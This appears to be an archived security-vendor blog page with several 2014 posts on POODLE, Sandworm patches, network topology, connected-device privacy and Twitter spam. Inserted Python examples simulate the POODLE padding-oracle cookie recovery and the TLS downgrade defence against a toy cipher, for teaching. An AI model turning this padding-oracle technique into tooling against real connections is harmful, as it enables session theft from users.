    Earlier today, Google researchers Bodo Möller, Thai Duong, and Krzysztof Kotowicz released a paper describing a serious flaw in SSL 3.0 that lets an attacker positioned between a web server and an end user (a man-in-the-middle) decrypt portions of the supposedly protected traffic.

    For example, if you’re shopping online with your credit card, you may think that your information is secure, but thanks to this bug (known as POODLE) it may actually be at risk. An attacker on the network path can recover secrets such as your session cookie from the encrypted connection and use them to take over your session, retrieve the information you entered, or change your order.

    The bullet points below summarize the key facts about this vulnerability:

    • CVE ID: CVE-2014-3566
    • Popular name: POODLE (Padding Oracle On Downgraded Legacy Encryption)
    • Vulnerability: padding oracle in SSL 3.0 CBC cipher suites, reachable by forcing a protocol downgrade to SSL 3.0
    • Attack vector: man-in-the-middle (the attacker must be on the network path and must also be able to make the victim’s browser send requests, for example through injected JavaScript)

    How does the POODLE attack work?

    According to the paper, the key issue is the padding that SSL 3.0 adds to records encrypted with a block cipher in CBC mode. Only the last padding byte (the padding length) is defined; the remaining padding bytes are arbitrary, and none of them is covered by the MAC or checked by the receiver. An attacker who has hijacked the connection can therefore replace the final block of a record with a chosen ciphertext block: whether the server accepts or rejects the modified record tells the attacker whether one byte of the decrypted target block has a particular value. Repeating this recovers the plaintext one byte at a time, after 256 attempts per byte on average, which is enough to steal secrets such as session cookies from captured traffic.
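    As an added illustration (not code from the paper or from this post), the following Python simulation shows the padding flaw and the byte-by-byte recovery described above. It assumes a toy 16-byte Feistel block cipher in place of the real cipher, HMAC-SHA1 in place of SSL 3.0’s own MAC construction, and a constructed HTTP request layout in which the attacker controls the lengths of the URL path and the request body; the secret being recovered is the cookie value. The attacker only sees whether the server accepts each modified record.

```python
# Added example (not from the TrendLabs post): simulation of the SSL 3.0 CBC
# padding flaw that POODLE exploits. A toy Feistel cipher stands in for the real
# block cipher; the attack depends only on CBC mode and the unchecked padding.
import hashlib
import hmac
import os

BLOCK = 16
MAC_LEN = 20  # SHA-1 sized MAC, as in SSL 3.0 SHA cipher suites


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, half, i):
    # Round function of the toy 4-round Feistel cipher (assumption: stands in for AES).
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, r, i))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, l, i)), l
    return l + r


def ssl3_encrypt(key, mac_key, data):
    """MAC-then-pad-then-CBC as in SSL 3.0. Only the final byte (the padding
    length) is defined; the other padding bytes are arbitrary and never checked."""
    mac = hmac.new(mac_key, data, hashlib.sha1).digest()
    pad_len = (BLOCK - (len(data) + MAC_LEN + 1) % BLOCK) % BLOCK
    padded = data + mac + os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return iv + out


def ssl3_decrypt(key, mac_key, record):
    """Returns the plaintext, or None for a bad_record_mac alert (the oracle)."""
    iv, body = record[:BLOCK], record[BLOCK:]
    plain, prev = b"", iv
    for i in range(0, len(body), BLOCK):
        c = body[i:i + BLOCK]
        plain += _xor(block_decrypt(key, c), prev)
        prev = c
    pad_len = plain[-1]
    if pad_len >= BLOCK:
        return None
    stripped = plain[:len(plain) - pad_len - 1]  # padding bytes are not inspected
    data, mac = stripped[:-MAC_LEN], stripped[-MAC_LEN:]
    if not hmac.compare_digest(mac, hmac.new(mac_key, data, hashlib.sha1).digest()):
        return None
    return data


def run_poodle_attack(secret, max_tries=20000):
    """Recover `secret` (a cookie the victim's browser sends on every request)
    using only the ability to choose path/body lengths and the accept/reject oracle."""
    key, mac_key = os.urandom(16), os.urandom(16)  # unknown to the attacker

    def browser_sends(prefix_len, suffix_len):
        # Constructed request layout; the attacker controls both lengths.
        req = (b"GET /" + b"A" * prefix_len + b" HTTP/1.1\r\nCookie: "
               + secret + b"\r\n" + b"B" * suffix_len)
        return ssl3_encrypt(key, mac_key, req)

    def server_accepts(record):
        return ssl3_decrypt(key, mac_key, record) is not None

    header_len = len(b"GET /") + len(b" HTTP/1.1\r\nCookie: ")
    recovered = b""
    for j in range(len(secret)):
        # Prefix length puts secret[j] in the last byte of some block t ...
        prefix_len = (BLOCK - 1 - header_len - j) % BLOCK
        t = (header_len + prefix_len + j) // BLOCK + 1  # index into [iv, C1, C2, ...]
        # ... and the suffix length makes the record end with a full padding block.
        base_len = header_len + prefix_len + len(secret) + 2
        suffix_len = (-(base_len + MAC_LEN)) % BLOCK
        for _ in range(max_tries):
            rec = browser_sends(prefix_len, suffix_len)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]
            n = len(blocks) - 1
            blocks[n] = blocks[t]  # swap the target block into the padding position
            if server_accepts(b"".join(blocks)):
                # Accepted only when the decrypted last byte equals BLOCK-1, so
                # P_t[15] = (BLOCK-1) ^ C_{t-1}[15] ^ C_{n-1}[15].
                recovered += bytes([(BLOCK - 1) ^ blocks[t - 1][-1] ^ blocks[n - 1][-1]])
                break
        else:
            raise RuntimeError("oracle never accepted; increase max_tries")
    return recovered


if __name__ == "__main__":
    print(run_poodle_attack(b"s3cr3t"))
```

    Each attempt succeeds with probability 1/256 because every record is encrypted afresh, which is why the real attack needs the browser to resend the same request hundreds of times per byte. TLS 1.0 and later are immune to this particular trick because they define and check every padding byte.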

    SSL 3.0 is an old encryption protocol dating from 1996. It has been succeeded by TLS (now at version 1.2). The TLS handshake itself protects version negotiation, but many browsers implement their own fallback: if a handshake at the highest supported version fails, they retry at a lower version on the assumption that they are talking to a buggy server. An attacker on the network path can make those handshakes fail on purpose.

    Consider the example below. The browser supports TLS versions up to 1.2. In the first handshake, it offers the highest version it supports (TLS 1.2). If that handshake fails, the browser retries with earlier versions (TLS 1.1, then TLS 1.0). By interfering with each of these attempts, the attacker walks the browser down to SSL 3.0, at which point the POODLE vulnerability can be exploited to decrypt communications between the two parties.


    Figure 1:  Attackers may force the communication between a client and server to downgrade from TLS to SSL 3.0 to be able to decrypt the network communication


    This vulnerability can be avoided entirely by disabling SSL 3.0. Site administrators can disable support on their side; in Apache, for example, this means removing SSLv3 from the SSLProtocol directive of mod_ssl (the mod_ssl documentation shows how).

    End users can disable SSL 3.0 support on their end as well, through the following steps:

    • For Chrome users, starting Chrome with the command-line flag chrome.exe --ssl-version-min=tls1 sets TLS 1.0 as the minimum protocol version, so SSL 3.0 is never offered.
    • In Firefox, type about:config in the address bar to open the settings. Search for security.tls.version.min and set its value to 1 (TLS 1.0); the default of 0 still allows SSL 3.0.
    • Internet Explorer users can follow the steps in Microsoft Security Advisory 3009008 to disable SSL 3.0.

    Enterprises have a further option on the server side. Disabling SSL 3.0 outright is not practical everywhere, since some legacy clients still require it. The Google advisory therefore recommends that web servers (and browsers) support the TLS_FALLBACK_SCSV mechanism: a browser that retries a failed handshake at a lower version includes this signaling value in the retry, and a server that supports a higher version than the one offered rejects that retry instead of accepting it. SSL 3.0 is then used only when a genuinely legacy implementation is involved, and an attacker can no longer force a protocol downgrade.
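    The downgrade dance from Figure 1 and the TLS_FALLBACK_SCSV check just described, as an added example that is not part of the original post or of any browser or server code. It assumes the signaling cipher suite value 0x5600 later standardized in RFC 7507, a constructed cipher suite list, and an on-path attacker modeled as simply resetting every handshake above the version it wants.

```python
# Added example (not from the TrendLabs post): browser fallback loop, an on-path
# attacker that breaks handshakes, and a server with or without
# TLS_FALLBACK_SCSV support. Version numbers are the TLS wire values.
SSL3, TLS10, TLS11, TLS12 = 0x0300, 0x0301, 0x0302, 0x0303
TLS_FALLBACK_SCSV = 0x5600  # signaling cipher suite value from RFC 7507
ORDINARY_SUITE = 0x002F     # TLS_RSA_WITH_AES_128_CBC_SHA, used as a placeholder
NAMES = {SSL3: "SSL 3.0", TLS10: "TLS 1.0", TLS11: "TLS 1.1", TLS12: "TLS 1.2"}


class Server:
    def __init__(self, max_version, supports_scsv):
        self.max_version = max_version
        self.supports_scsv = supports_scsv

    def handle_client_hello(self, client_version, cipher_suites):
        """Returns ('server_hello', negotiated_version) or ('alert', reason)."""
        if (self.supports_scsv and TLS_FALLBACK_SCSV in cipher_suites
                and client_version < self.max_version):
            # The client says this is a fallback retry, yet we support something
            # higher than it offers: the earlier attempt was interfered with.
            return ("alert", "inappropriate_fallback")
        if client_version < SSL3:
            return ("alert", "protocol_version")
        return ("server_hello", min(client_version, self.max_version))


class Attacker:
    """On-path attacker who kills every handshake above `allow_up_to`."""

    def __init__(self, allow_up_to):
        self.allow_up_to = allow_up_to

    def forward(self, server, client_version, cipher_suites):
        if client_version > self.allow_up_to:
            return ("failure", "connection reset by attacker")
        return server.handle_client_hello(client_version, cipher_suites)


def browser_connect(server, attacker=None, send_scsv=True,
                    versions=(TLS12, TLS11, TLS10, SSL3)):
    """Browser fallback loop: after a failed handshake, retry one version lower.
    Returns the negotiated version, or None if no handshake succeeded."""
    for i, version in enumerate(versions):
        suites = [ORDINARY_SUITE]
        if send_scsv and i > 0:
            suites.append(TLS_FALLBACK_SCSV)  # mark this hello as a fallback retry
        if attacker is not None:
            kind, payload = attacker.forward(server, version, suites)
        else:
            kind, payload = server.handle_client_hello(version, suites)
        if kind == "server_hello":
            return payload
        if payload == "inappropriate_fallback":
            return None  # the server refused the downgrade; do not keep retrying
    return None


def scenarios():
    """Outcome of the four cases practitioners care about, keyed by description."""
    mitm = Attacker(SSL3)
    return {
        "no attacker, SCSV-capable server": browser_connect(Server(TLS12, True)),
        "attacker, server without SCSV": browser_connect(Server(TLS12, False), mitm),
        "attacker, browser without SCSV": browser_connect(Server(TLS12, True), mitm, send_scsv=False),
        "attacker, SCSV on both sides": browser_connect(Server(TLS12, True), mitm),
        "legacy SSL3-only client, no attacker": browser_connect(Server(TLS12, True), versions=(SSL3,)),
    }


if __name__ == "__main__":
    for case, result in scenarios().items():
        print(f"{case}: {NAMES.get(result, 'handshake failed')}")
```

    The last two cases are the point of the mechanism: the downgrade is blocked only when both sides implement it, and a client that genuinely supports nothing newer than SSL 3.0 still connects, because its first (and only) hello carries no fallback marker.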

    We will continue to proactively monitor for threats that use this vulnerability and provide updates and solutions as necessary.

    Update as of 1:48 PM, October 15, 2014

    Trend Micro Deep Security customers are protected from attacks that may leverage POODLE vulnerability via the following DPI rules:

    • 1006293 – Detected SSLv3 Request
    • 1006296 – Detected SSLv3 Response

    When it comes to targeted attacks, attackers are not omniscient. They need to gather information in the early stages to get to know the target, drawing on various sources of intelligence such as Google, Whois, Twitter, and Facebook. They collect data such as email addresses, IP ranges, and contact lists, which are then used as lures in phishing emails that give them access to the targeted organization’s network.

    Once inside, the attackers begin the lateral movement stage. Here they perform port scans, service scans, network topology mapping, password sniffing, keylogging, and probes of the security policy. The goal is to find more confidential information and a stealthy method of access.

    Lateral movement gives the attackers information they can use to their advantage. They now know the existing security weak points, flaws in firewall rules, and poorly placed security equipment. They also hold the latest network topology, password sets, and security policies.

    They can use this knowledge even after their intrusion has been discovered. Often, efforts to thwart existing attacks and prevent new ones stop at removing the malware and monitoring network activity. But since the attackers know the topology, they can find new ways back in without being noticed.

    Earlier, we posted an entry detailing how IT administrators can protect enterprises from targeted attacks and breaches by looking at their network vulnerabilities. In this blog post, we want to tackle how network topology can aid in defending the enterprise network from the risks posed by targeted attacks.

    Changing the Network Topology

    It’s not enough to change passwords and remove the malware. To protect an organization from targeted attacks, changing the network topology should also be considered.

    Network topology refers to how devices are connected within a network, both physically and logically. It covers all devices connected to the network: computers, routers, servers, and so on. Because it also describes how those devices are allowed to reach each other, we use the term here to include the passwords, security policies, and similar controls that govern those connections.

    If the targeted organization changes its network topology, the knowledge the attackers gained becomes useless to them. If the threat actors try to re-enter using the old route, the newer security policies will flag the attempt. Changes such as moving the “location” of the target data or re-segmenting the network force the attackers to spend longer finding the data again. That extra time is invaluable: it gives administrators a better chance to detect the malicious activity before any real damage is done.



    I prefer using the phrase “Internet of Everything” when discussing what most people call the Internet of Things because in many ways, the latter term isn’t enough. What makes the Internet of Everything so powerful is the data about you and me that these devices can gather.

    Consider how these devices actually work. They almost always need to “phone home” to some central server run by the service provider. This means that anything that you do on the device is seen by the provider. You have to trust that they will keep your data secure and not misuse it or neglect it over time.

    Unfortunately, there are many ways your data can be misused or compromised. The devices themselves can be insecure and fall to an attacker. The software modules they use, often taken from open source projects, accumulate known vulnerabilities over time, and the vendor may not have planned how to get fixes onto the devices quickly and seamlessly. The servers themselves can be compromised and breached in a targeted attack.

    This doesn’t even enter into what the service provider can do with your data. You don’t really realize the extent of the data that an IoE device can take until you read the privacy policy. These policies, however, are difficult to comprehend, and may change over time without any notification to the consumer.

    Privacy policies will at least be able to say what data is collected, but in general they don’t disclose the full reality of what can be done with your information. As an example, many will have provisions stating that the data will be used to deliver the services provided. In practice, this broad generalization can be used as a legal basis to justify many different ways to use and possibly exploit your data.

    So, what should users do? Before purchasing an Internet-connected hardware device, make sure that you are comfortable with the fact that any data you provide could be stored for a long time on poorly secured servers in data centers in other countries. Your personal “data at rest” on the manufacturer’s servers represents a risk to you that grows over time. The risks include data breaches, sharing or resale of your data, and general neglect of the data after events such as a security lapse at the company or its sale or merger.

    If you’re the type of consumer who is concerned about privacy, find out what kind of data (personally identifiable information, user credentials, and so on) the device gathers and sends to the vendor by asking the vendor’s sales or support staff. If you’re considering different service providers for the same kind of service, compare their privacy policies and see which one you feel comfortable with. Reviewing the privacy policy is a good start toward understanding what they may be doing with your data.

    Consider, too, that many venture-funded startups may not have fleshed out their business model yet. Your data is a key part of how they may monetize their service, initially or later on, and these pressures can result in its misuse. One could argue that a company charging more for its service up front is less likely to seek further revenue from your data, but there is no guarantee: data is a key element of the IoE. A more reputable company with a brand to protect may be a better choice, though that is not fully guaranteed either, as the recent gleaning of data from USB drives plugged into LG TVs shows.

    To know more on how to be safe in the Internet of Everything, read our “Security Considerations for Consumers Buying Smart Home Devices,” which can guide you in making decisions on the Internet connected devices you introduce into your daily life.


    Three of the nine security bulletins in today’s Microsoft Patch Tuesday are marked as Critical, while the rest are tagged as Important. The patches address vulnerabilities in Internet Explorer and the Microsoft .NET Framework, as well as the zero-day vulnerability affecting Microsoft Windows: MS14-060 covers the Sandworm zero-day, which was reported hours earlier.

    Based on our analysis, attackers may use this vulnerability to deliver and execute malware payloads, given that it is not difficult to exploit: an attacker who knows the file format can craft a PowerPoint document that triggers it. Trend Micro detects the exploit as TROJ_MDLOAD.PGTY and its payloads as INF_BLACKEN.A and BKDR_BLACKEN.A. Currently, this zero-day is believed to have been used in attacks against European sectors and industries.

    Another critical bulletin that users need to note is MS14-056, which fixes several vulnerabilities in Internet Explorer; successful exploitation could lead to remote code execution. Similarly, MS14-057, another bulletin tagged as Critical, could lead to remote code execution when exploited by remote attackers.

    Adobe also released security updates today to address vulnerabilities affecting certain versions of ColdFusion and Adobe Flash Player. These are covered under the following CVEs:

    • CVE-2014-0558
    • CVE-2014-0564
    • CVE-2014-0569
    • CVE-2014-0570
    • CVE-2014-0571
    • CVE-2014-0572

    We highly recommend that users patch their systems and update their Adobe products to the latest versions. The Sandworm zero-day highlights the importance of patching, since such flaws can be used by cybercriminals and threat actors to infiltrate a network and steal confidential company data and other information.

    Trend Micro Deep Security and OfficeScan with the Intrusion Defense Firewall (IDF) plugin protect user systems from threats that may leverage these vulnerabilities via the following DPI rules:

    • 1006267 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4126)
    • 1006268 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4127)
    • 1006269 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4128)
    • 1006270 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4129)
    • 1006271 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4130)
    • 1006282 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4132)
    • 1006274 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4133)
    • 1006279 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4134)
    • 1006273 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4138)
    • 1006283 – Microsoft Word And Office Web Apps Remote Code Execution Vulnerability (CVE-2014-4117)
    • 1000552 – Generic Cross Site Scripting (XSS) Prevention
    • 1006290 – Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-4114)
    • 1006291 – Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-4114) – 1

    Users may visit our Threat Encyclopedia page for more details on these security bulletins.

    Update as of October 16, 2014, 5:45 P.M.:

    The Sandworm vulnerability has been linked to attacks against specific SCADA systems. Read more about this in our post titled Sandworm to Blacken: The SCADA Connection.


    In the two previous parts of this series of blog posts, we discussed the kinds of threats that we’re seeing on Twitter, as well as the scope and scale of these threats. In this part, we will discuss their motivations, and what end users can do.

    The first question is: why do cybercriminals bother? Social media accounts are valuable in their own right. They can be used to make money in many ways, and any form of personally identifiable information (PII) they hold can be monetized by attackers.

    One way that stolen social media accounts are used is to send spam. One reason that social media spam can be considered superior to email spam is simple: more people click on links from social media than email. The click-through rate for email spam is estimated at anywhere from 0.003% to 0.02%. How does Twitter spam fare?

    It’s difficult to compare the effectiveness of Twitter spam with that of email spam exactly, since the two are measured differently. One measure we can use is the number of clicks we saw for every spammed Tweet. This varies with the type of abuse. Some Twitter spam campaigns were spectacularly successful: one viral campaign aimed at Japanese users drew 0.269 clicks per Tweet. More typical rates ranged from 0.01 clicks per Tweet for Twitter-specific spam to 0.03 for malware-linked Tweets. Even allowing for the difference in metrics, these numbers suggest that Twitter spam is more effective than conventional email spam.

    So now we’ve established that Twitter spam is a legitimate threat. How is Twitter responding? We are happy to say that this is a problem Twitter is getting on top of. Earlier this year, they disclosed the existence of BotMaker, their anti-spam bot infrastructure which has cut the spam problem by 40%. Other social networks can study Twitter as an example in how to deal with threats on their sites.

    For users, the lessons are clearer. First of all, do not believe any claims that you can buy followers, views, likes, friends, and so on. The numbers you buy will almost certainly come from compromised accounts and will add no value, or even negative value, to your own social media efforts. Your own account may also be compromised in the process. Shortcuts to social media popularity don’t exist.

    Secondly, you should already be careful about clicking on links posted on social media in general, but be particularly careful about links that say that you have to log in again because your original log in timed out. Close your browser and start again; if you see the same message it’s almost certainly a phishing page.

    Lastly, if the social media services you use support it, turn on two-factor authentication. Just about all large online services today offer some support for two-factor authentication. Turning it on makes compromising your account much harder, as an attacker has to somehow compromise your phone as well. It’s not impossible – other Trend Micro research has shown how this can be done with online banking. However, it is still a useful security precaution to take against most attacks targeting social media.



    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice